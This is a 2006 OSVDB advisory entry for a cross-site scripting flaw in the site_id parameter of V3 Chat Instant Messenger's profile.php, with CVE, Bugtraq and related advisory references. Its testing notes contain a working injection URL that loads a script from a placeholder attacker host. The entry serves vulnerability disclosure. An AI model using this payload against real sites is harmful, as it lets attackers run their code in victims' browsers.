V3 Chat Instant Messenger profile.php site_id Variable XSS

2006-06-17T05:34:00
ID OSVDB:26722
Type osvdb
Reporter luny(luny@youfucktard.com)
Modified 2006-06-17T05:34:00

Description

Manual Testing Notes

http://[target]/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://[attacker]/xss.js></SCRIPT>">

References:

Vendor URL: http://www.v3chat.com/ Security Tracker: 1016340 Secunia Advisory ID:20649 Related OSVDB ID: 26721 Related OSVDB ID: 26717 Related OSVDB ID: 26720 Related OSVDB ID: 26725 Related OSVDB ID: 26718 Related OSVDB ID: 26719 Related OSVDB ID: 26726 Related OSVDB ID: 26715 Related OSVDB ID: 26716 Related OSVDB ID: 26723 Related OSVDB ID: 26724 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0439.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0421.html FrSIRT Advisory: ADV-2006-2474 CVE-2006-3366 Bugtraq ID: 18543